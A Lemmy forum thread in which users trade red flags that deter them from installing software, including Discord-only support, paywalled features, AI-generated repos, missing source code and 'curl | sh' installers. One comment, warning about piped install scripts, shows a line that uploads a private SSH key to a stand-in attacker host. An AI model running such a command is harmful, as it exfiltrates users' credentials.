What are some software red flags?
5d 11h ago by lemmy.fedioasis.cc/u/Cantaloupe in asklemmy
Have you ever found a GitHub project or anything that seemed nice and tempting to install until you dug a bit deeper?
What are some red flags that should detur anyone from installing and running something?
Support only through a Discord server
I recently deleted my Discord account. This is an immediate nope for me.
Sadly way too many niche groups there and also fb for me to delete. I'd have nothing otherwise.
I just interact as little as possible and never install their software.
Especially in the homebrew/modding world some even only distribute their stuff over discord. Which is an extra level of stupid. Dont think anything else can beat this.
Stalker Gamma comes to my mind, for that you had to join a discord in order to access the launcher, that launcher would auto download and install a bunch of mods for Stalker Anomaly into one big modded game.
Soma Assetto Corsa mod packs were only available to download through Discord, it was awful
"Ads, In-App Purchases"
That game is gonna be full-on enshitification.
I'll see that and raise you a "app is free, but all functionality is paid, which you only find out after you have used the app for its intended purpose and now want the results of the work that you did, specifically when attempting to rescue files from your phone, for instance."
I'll also toss in "all functionality is paid on a subscription model that automatically renews unless you manually disable it and you have to buy at least in one year increments"
I really like the 'free trial' that requires your CC information and will begin billing you 'soon' unless you remember to cancel (and probably burn the card too).
Yeah, in app purchases.
Goddamn! Had this one with "smartdraw.com" lately. I had to draw up a map of our property for a buidling permit, so I looked for an appropriate tool. Spend 3 hours drawing a layout. but turned out I can't export the drawing unless I buy a year subscription of 8 dollars per month. Fuck them and fuck subscriptions! I downloaded LibreCAD and learned the basics of that.
The 2017 full version of SketchUp is similarly free, FYI. You just have to dig for it on the website.
If I can remove the ads, and unlock pro features with a one time purchase, sure, but if the app is charging me monthly, that's a deal breaker.
That's not the case at all. For ads, perhaps, but in application purchases? Many games (especially free to play games, of which there are many excellent ones) have purchases you can make in the game.
Helldivers 2 is an excellent game, and that has DLC packs and individual items you can purchase in game. So does World of Tanks (which is also free to play).
Even some perfectly normal applications have that tag, because there's a shareware version (maybe with a launch nag "Ad") and the full paid version (which may only cost a few quid), that you can upgrade to from within the free version. It still counts, even if it's just a one time thing.
There are many scummy practices some game/application makers employ using ads or in-app purchases, but many don't, and both types have that sort of label applied.
Honestly, I see that label applied to basically everything these days, so I just ignore it and judge the application based on the nuance of how their monetisation is presented.
Are you really using world of tanks as a good example of in app purchases?
Evidence of vibe-coding. Em dashes and emojis sprinkled throughout the documentation? Code with inline comments pointlessly describing some change, as if you want to know what that block of code used to do more than what it actually does?
It's vibe-coded garbage by someone who doesn't know how to code. Stay far away.
inline comments pointlessly describing some change, as if you want to know what that block of code used to do more than what it actually does?
Oh, shit, am AI.
Same, but only after my boss decides to change the functionality for the third time in half a year.
Exactly. I worked on a interface where the elements where shift under conflicting business interests. The comments where a log of dates, person, and what they asked for as we worked on our side to build a case against the insanity.
The comments listed not only what it clearly did but also what it had previously done. Then inevitably something comes in hours before a launch window and that part does not get its comment updated.
Omfg Gemini loves to add tons of comments on already self explanatory code. It’s super annoying.
I have a solution to that:
🌈✨ Stop using AI to code. ✨🌈
That ship has sailed. The question is how to use AI to code, for every project there's a sweet spot and it rarely is 0% or 100%.
You really don't need to. Nobody is forcing you.
And if they are, seriously considering finding another place of work.
Good luck finding a tech company that isn't forcing devs to use AI.
Uh, I'm working at one.
That was quick.
Are they hiring?
Yes, regularly. Company is based in Northern Scandinavia, but German-owned.
And? I didn't say it was impossible. I said "good luck"
What do you mean "and?"?
I didn't say you said it was impossible lol. You said good luck, implying it's hard, I said I found one immediately because I'm working at one. And I know several other companies and workplaces, too.
It's not hard. Take the L.
The tech job market is awful right now and you know it. And you also know most tech companies ARE followers forcing their devs to use AI because that's the industry trend and that's what tech companies do.
Your original comment was totally disingenuous and you're mad that you got a disingenuous response? Lol. If it were that easy I'd be gone already but it isn't.
I know the tech job market is tough, but it's not universally like that. My comment was not disingenuous, in my opinion. But we may have different perspectives and that's fine. It's just not hard for me to find a workplace where they aren't forcing AI down my throat.
I don't know that "most tech companies" are forcing their devs to use AI, no. Maybe the big ones? I don't know of any in my local area who would be so stupid. All I hear right now with the latest talk around me is how do we use AI responsibly. And how do we utilize it for the right problems and the right reasons.
It might be like this in America where it's all about growth growth growth and where everyone is sorta struggling right now, but in my part of the world we're chilling a bit just yet. I know many of my peers who are hard into AI, but all I hear is that it's mediocre at best at solving the hard problems.
So I'm sitting tight. I don't need AI for my work at all, as a web dev. I know what I'm doing and I enjoy my craft and my deliveries have high quality and low code mass. I'm not interested in letting a robot do my work for me and I be the code reviewer for the rest of my career (the boring part). Hell to the naw. I want to do the fun stuff, be creative and solve problems. That's why I became a programmer in the first place.
An AI is not as up-to-date on the current web standards as I am anyway. Most of the code it's spitting out is legacy garbage because that's what it's been trained on. The web platform moves too fast.
I very much enjoy using AI for all the biloilerplate, test cases, suggestions, etc. It really makes me more productive, hard metrics behind it. Nobody is forcing me to, they just provide the license and let us use our judgment.
I honestly can't think of a project where 0% AI would be better. For 100% maybe a very trivial PoC, but even that would require at least a code revision.
So, as with many things, use in moderation is fine.
It's almost certainly also making your code worse.
It's not impossible to use AI effectively (although I would argue it's impossible to use large "frontier" models ethically, as the companies making them are burning the planet down to power the process), but you have to be extremely vigilant and thoughtful about what you're using it for, and you have to review every single line of code it produces, or you're going to miss bugs and you're going to lose skills.
A good way to test yourself is to see if you can still scaffold out an application by hand. Doesn't matter what... A to-do list, some buttons, whatever. Just test yourself to see if you can still do it.
If you can't, then you've lost the skills necessary to be certain that what you're producing with AI is actually good.
And if the idea of testing yourself like this makes you uncomfortable? Then AI isn't a tool you use, it's an addiction.
I mean, I do leet code semi-regularly, so I'm not too worried about getting rusty. Writing tests is boring as hell, the AI does a decent enough job for at least 90% of them.
Leet code is good for making sure you still have a good grasp of programming conceptually, but I don't think it's good for testing your own practical skills.
Seriously, just take an hour or two to scaffold out something new. Doesn't have to be complicated, just something to confirm for yourself that you can still do it. The only rule is to do it without AI.
When I did it myself, it was after months of my work requiring me to use AI, and there was a moment at the start where I was tempted to just fire up Copilot and tell it to do the work, which - of course - would have defeated the purpose. It was that moment where I realized I was addicted, and needed to go cold turkey.
Now I do the bare minimum with AI I'm required to at work, and focus on crafting my code carefully, by hand as much as possible. And it shows. My code quality has improved.
What do you mean by scaffolding something new? If it's writing all the boilerplate for the framework and dependencies, that's exactly what I don't care about. I use AI now and copy paste in the past.
No, I don't mean writing all the boilerplate. It's simpler than that.
Just to take a random example, let's say the throwaway project you decide to do is build a custom button component in Angular. The steps would be something like this:
ng new buttons- (Answer prompts)
cd buttonsng serve- (Create a custom button component in the new project)
I chose Angular because these days the CLI for it does almost everything for you. It's absurdly easy, and is the sort of thing it may actually be slower to ask an AI to do, because the AI will absolutely try to create a bunch of things in the project itself rather than through the CLI. And it will use Angular patterns from 2024 rather than anything current (such as Signals), because of its training data.
Not only is doing something like this (in whatever language you prefer) good practice for keeping your practical skills, it's a good reminder that AI is only one tool in the toolbox. If it becomes your only tool, well... The old saying about how if all you have is a hammer everything looks like a nail applies.
Back when I had to do frontend the AI did use create-react-app. No idea about angular. If it's on stack overflow, the AI knows about it (even if it doesn't always use it).
Even if you ask to create a one shot PoC, sometimes it will use Maven, sometimes Gradle. If you want something specific you include it in the prompt or preferences.
I'd be curious to see what your hard metrics are based on.
https://mikelovesrobots.substack.com/p/wheres-the-shovelware-why-ai-coding
https://filebin.net/zf92vn7hm4zcabe9
Points per sprint, features shipped, test coverage. Defects remain unchanged.
Code quality? Maintainability down the line? Numbers for those aspects yet?
It's been more than 3 years since we started, and the metrics are stable, slight improvement even but that could be more experience or better models or anything. No apocalypse.
Happy that it's working out for at least a small margin of people. 👍
There's always the many ethical aspects as well, of course.
The ethics are debatable, but there's not turning back, there's plenty of open source models even that do a very decent job, so we will need to learn to deal with the reality. We never hired juniors anyway, but companies that did apparently have stopped, that can't be good.
In my opinion, the ethics are clear problems. There are way too many ethical issues for me to even consider using AI right now. I would never have a clear conscience using AI. Using AI as a service responsibly is impossible right now IMO.
I don't see it that bad. Specially open source models. Agree to disagree I guess.
Open source models aren't really used in AI as a service though, are they?
Depends what you consider as a service. Anthropic and OpenAI will only offer their own stuff, but if you go for AWS Bedrock you have plenty of open source ones. Probably similar for Vertex on GCP. God only knows what Microsoft is doing over there.
Either way, ethically, I wouldn't use anything that's hosted on an AI data center.
cough huntarr cough
Yeah, that... I feel really bad for anyone who trusted and implemented it. The sheer level of exposure with that was mind-blowing. I mean, an endpoint you could hit and just... Get all the API keys?
For anyone who doesn't know, this write-up is a good one: https://gigcitygeek.com/2026/03/08/huntarr-api-security-risk/
Long story short, a vibe-coded security nightmare for anyone foolish enough to trust it.
the fucking bouncing arrow at the bottom of the page is insufferable
Emoji ridden repos just scream scam to me, too. I feel like people who genuinely want to make an app and actually keep it maintained wouldn't resort to AI slop code or even a description.
"Call us for pricing"
Aaaaaand tab closed.
I can’t believe that marketing people are this fucking stupid.
Like, full-on knuckle-dragging morons.
They intentionally drive away more paying customers than they could ever “channelize” with this method.
Because most people realize that prices are only ever hidden for malicious, anti-consumer purposes.
Thats for every industry. The burger van with the prices in micro-text behind the guy asking what you want and you better hurry up cause theres a queue
Your example can be wholly explained by inadequate knowledge of visual design (UI/UX, to be specific), especially from a consumption/access position. That’s a technical outcome which is a result of ignorance or failures, not a sales outcome from an explicit strategy of obfuscation.
To put it another way, people making too-small signs for their yard sale that drivers just cannot see at speed, is not the same as companies going “call for pricing”. That would be the same as signs saying, “call us for the yard sale address”. The former is wholly unintentional and borne out of ignorance, the latter is completely intentional anything but accidental.
"releases" on a GitHub repository containing no code
OpenOffice wanders into the chat
Requires cloud connectivity.
The size of the download button
"To use program xyz, sign up!
-
It's not already in my distro's package manager
-
A github project with 1000 open issues and no commits for 3 years.
Ubuntus package repo is so out of date though. It's such a pain in the ass.
You clearly haven't seen Debian stable.
My distro has one of the highest amount of software packaged, yet i regularly find software i like that isn't. There will always be software that isn't packaged yet useful, i reckon.
Venture capital funding. The plan is always to do a rug pull. Though if it properly freely licensed and the code is reasonable enough to be forked, it's less worrying but still risky. It's better to work with honest people.
This is why I avoid Bluesky
https://bsky.social/about/blog/03-19-2026-series-b
I didn't know this about bluesky D:, but it makes sense. Thanks for the heads up. The atproto ecosystem seems to have cool features for user empowerment and it seems to work well on the few occasions I've visited atproto sites. I hope they can find an ethical way to persevere, but I can't imagine that being easy.
curl | shinstallation method- vomit-colored website, vomit-colored developer avatars, or more obvious: AGENTS.MD in the repo
- compiling yourself is "unsupported"/"not recommended"
- the official website aggressively advertising the company's SAAS which makes it look like their opensource software is actually paid product
- github issues using convoluted template, instead of letting me write freeform text
It's annoying that the Proxmox helper scripts are all curl | sh based.
Noob here, what's wrong with curl | sh installs?
The real answer is that user-agents can be used to show you one version in your browser and then serve you another one with curl.
I say "real" because all the idiots talking about "don't run scripts from the internet!!!!" probably forget they don't decompile every binary they run. E.g. the rustup installer (the tool for managing Rust toolchains) is by default a curl+bash one liner. Why would I worry about them serving me a wrong script when I'm any way about to run their binary blob?
If you have any doubt about the hosting service (which might or not be the same as the software author!) then avoid piping into bash, but then why would you run their code at all if you distrust them so much? Do you expect github to install a keylogger? Probably not. Some telemetry hook to know whose running the requested script? Possibly someday
“Download this shell script from the web and execute it right away.”
Probably close to 80% of the words in the sentence are wrong.
As others have said, you are boldly trusting that the script you’re downloading is safe. ALWAYS examine a script before you pipe to bash. Also, open the script in your browser, the copy paste j to your terminal. It’s entirely possible to change the script based on use agent to display differently when your check in your browser versus when you pipe to bash
Let’s say you curl bash something and it has ie ‘scp ~/.ssh/id_ed25519 badComputerGuy’ in it then you just uploaded your private key to the bad guys. And that’s why ssh keys should be password protected
It forces you to blindly trust that whatever script curl will download is save to run and does exactly what you want / was promised as it will be executed right away.
In THEORY they're bad because the script could do malicious things and you shouldn't blindly trust random people on the internet telling you what to execute.
In practice it's mostly fearmongering because you're likely trying to install a binary that could do malicious things anyways. "Mostly" because it is a bit less safe as one could MITM the script more easily or something, but not really by that much.
You shouldn't run curl | sh scripts some random person sends you, but running an official script prom an official source is no more dangerous than running a .Deb file from that same source.
Some mature projects still do curl .sh, like pivpn and pihole.
which makes sense because they don't maintain packages on the dozens of different package manager repos.
IMO it's kind of bogus to knock a project for having a shell install file.
Eh, I'd be more sympathetic if there weren't a dozen different alternatives to making this exclusively how people install your software.
It's a virus delivery system waiting to happen. Especially now when you have AI that can help you stand up an imposter site quickly and easily.
If it's not open source or you are not compiling it:
Why so much fear about the shell script but no fear from the executable?
If it's open source and you are compiling it:
If you don't fear the project because you (presumably) have read the source code and determined that it's fine, why fear a shell script that is most certainly simpler, and you can read it like the rest of the code?
Why so much fear about the shell script but no fear from the executable?
Huh? Fear from both.
If you fear both, and curl | sh is a red flag. Binary blob is also a red flag, if you fear them both equally.
Has every software that runs in your computer been compiled by you?
No, but much of it comes from software repositories, which is exactly the point.
it's not the impact to the user having dozens of choices.
it's the impact to the developer to having to maintain the packages for dozens of package repo admins that have each their own special requirements for packages that have to be followed. it's a huge pita that most companies don't even bother with and just run their own package repo.
IMO the user isn't blameless when using an install script. anyone who just blindly runs arbitrary code without reading it is a fool asking to be attacked.
Exactly, it's a shift in responsibilities from the developers of a thing to the users of that thing.
As a grunt at work and a mid-tier "money haver" at best, I'm tired of having everything shift its costs onto me and it's a red flag that prevents me from installing and running a software package.
Everything around nowadays does this shift if they can get away with it.
I have to set limits on what I tolerate to achieve what gain or the world will leave me dead with a giant tire mark across my chest.
as a foss dev, your problems aren't my problems.
As a sporadic foss contributor and foss advocate, I ain't even installing your shit if the only install option is curl pipe to shell.
And I also do think it's a red flag exactly like the original poster was looking for.
if you're dumb enough to pipe curl to bash you deserve everything you get.
rtfs
I hate Windows partially because you have to download a bunch of random executables. Making that same security hole into a one liner in bash and making that the only install supported is not an improvement in any way.
- how does curl into sh differ from downloading exes from the Web, or pip/npm/crago/mvn install
- gods forbid people had bad design skills
- AGENTS.md: gods forbid people used tools that I do not agree with
- next 2 I agree with
- people are terrible at describing bugs, they often do not add steps to reproduce, expected outcome, so the bug template helps waste less time
Back in the Python 2.7 days, curl | grep sh was the standard practice for installing the package manager, pip. Even better, the shell script actually had a binary blob somewhere in the middle. It was shell script up top, binary blob in the middle, and back to shell script at the bottom. Until Python 3.5ish, pip wasn't bundled with Python, so this was standard practice.
- New post about a promising selfhosted app
- looks inside
- em dashes, emojis, release in last 24h with 35 commits since.
I fucking swear, if only vibe coders would ACTUALLY write up their own posts about THEIR OWN SOFTWARE, many would not act harsh towards them as much as it happens.
What's wrong with em dashes? I use it wherever English syntax requires it.
Whenever they start with "I built XXX". People who write their own code say "I wrote".
Eh, disagree on that one. Even if I write every bit of the code myself, producing good working software involves a lot more than just writing code. Just makes "building" feel like a better descriptor.
You may be the exception to the rule :)
If the project maintainer has a policy of "no politics allowed."
Rather than a policy more along the lines of "be respectful"
100%.
Then you look through their history and it's them laugh emojiing something like doing a LGBT suicide or some ridiculous shit.
The repo does not actually contain the source code, instead a link to download from a different site.
Unless that different site is Codeberg.
Or git.gay or Bitbucket.com
Something I ran into just now was AI generated Imagery in Docs or as an Icon.
I am not even that Anti AI as many on here I feel like. But this is a sure fire way to show how much you don't give a shit about your project. Just use emojis or some shit which is ironically even less work but somehow makes it seem more deliberate.
I tried to explain that to my manager but he didn't believe me
Bun seems cool, but it's icon looks too much like slop
I don’t think it is. IIRC they had that before AI Image Generation was widely available. You really can’t tell though with the simple cute art style which AI can very easily recreate.
Had a conversation with someone recently about exactly this. Usage of AI generated assets gives me exactly the same feelings as a local business using a gmail or personal ISP email account on their advertising.
It doesn't automatically mean it's bad, but it's an indication that whoever is running things just can't be bothered to put in effort.
“A user you’ve blocked has previously contributed to this repository.”
Where that user is Claude? I think that's the only username in my blocklist.
Having no user manual. A user manual is essential. A blurb about what it is and how to build it doesn't count. And please, integrate it with the software, OS, or at least distribute a readme alongside. So much offline software assumes you have a 100% stable internet connection for online help. Also, please don't throw up a wiki and rely on your users to do it.
This might be asking too much, but it wouldn't hurt to pay attention to principles of good technical writing as well. A well-written user manual brings your users a great deal of joy.
User manuals, I remember those, fondly. Unfortunately a pretty dead concept these days, but certainly a green flag if there is one, but absence is not a red flag.
A readthedocs.io entry is also a green flag (you can always download it for later offline...).
"Update/Accept or Remind me later"
The install process requires one of:
- Running a command with npm
- Manually compiling binaries from source
- Manually installing dependencies
These aren't bad per-se, but my experience has led me to associate these with spending a bunch of time trying to resolve errors and having to give up in the end and not install the software after all, so if there's any alternatives that I could use I am trying those first.
Omg. As soon as I see npm, I nope out. So so so so so many dependencies, broken this, not working that. I'm over it.
Supply chain attacks are a bitch.
Sometimes compiling is painless.
But if it throws any errors, I'm out.
A requirement.txt that doesn't list versions. Especially if it has pytorch. I've fought dependency issues for too long with projects like that.
all the academic code
GitHub repo that has "pm me on telegram" instead of code
join our discord
The build is failing on main. Or they don't have a build process at all.
Ah, sounds like my workplace.
A rule of thumb I use is how desperate the software is to tell you the weather even when you never asked for it or even set it up to report it.
Signing-in before being able to use a FREE software.
-glares at Canva after buying Affinity -
That’s why they bought it
Yeah, but it's still irritating. The only function they added to the software that i use is Image Trace. Otherwise i still use the old Affinity Designer that i bought years ago.
Serif were always great, I’m a bit doom and gloom on it
😭
Only Linux install option is .deb
do we not like Debian packages here?
If there is no Flatpak or AppImage it is not a serious project. There are many distros that are not debian or rpm based. Linux projects should be portable.
I like them because I’m old, and tired of distro-specific packages like rpm and deb. I want a thing that works no matter my distro of choice this week. The linux ecosystem is much larger than Debian.
you sound like an Ubuntu user.
Arch btw.
Ubuntu is debian-based.
Ubuntu is debian-based.
I know, that's why it was funny.
Arch btw.
"This project has been archived on [10+ years ago]. It is now Read Only."
or
Last commit 5+ years ago
Depends. Software can be done.
Shoutouts to picocrypt!
Cant remember what they are off the top of my head, but there's been a couple of times I wanted to download a FOSS program, but it was only available to install through the Microsoft store.
Some, like ImageGlass, provide workarounds. Like, they provide a separate install but it also comes bundled with the Opera browser (which itself has become two shakes away from raw spyware as of late), so you do have to be careful to deselect that option.
"Ask me later" instead of "no"
Requires weird IDE to build
I shifted 8 GB of files to an older machine just to be able to install Android Studio on barely-supported hardware, and now I'm cloning the repo and the .gradle directory alone is 1 GB?
You don't even need to check in .gradle to a repo, I always have that gitignored. And gradle projects should specify commands to build from CLI rather than having you download an IDE. Android Studio gives you a nice run button but it's just invoking ./gradlew installDebug under the hood
I'm amused that you mentioned requiring an IDE and then gave gradle (a standalone build tool) and Android as an example... when I'm pretty sure that ios actually requires xcode (AND an apple account) to build apps
I bet they checked in the binary. Git is really poor with binaries since it can’t really diff them. And the worst part is gradle should never have the binary in the source tree
The project is requires really weird unconventional set up. Doesn't package properly, configuration files in weird places, doesn't follow convention but doesn't gain anything from it
When installing if I see a pre-checked check mark I will be more likely to read what the software is trying to install. What are you trying to install now?
Goes without saying, but no activity for a very long time makes me skeptic. Also annoying when then aren't any releases, or only available as source.
No stars (although easily manipulated)
No commit history
No issue history
No pr requests (soft no)
No contributions from people with a active history
Something I do is if a project has way too many stars, click on a few of the names randomly.
If those profiles have 0-1 projects, my yellow flag (not red flag) goes up. Because yeah, it's really easy to buy GitHub stars now.
🚩 - here's one
This comment scares me
Web browsers are software, they can render a red flag
Runs on Windows CE
If it isn't in the AUR, it can't be useful.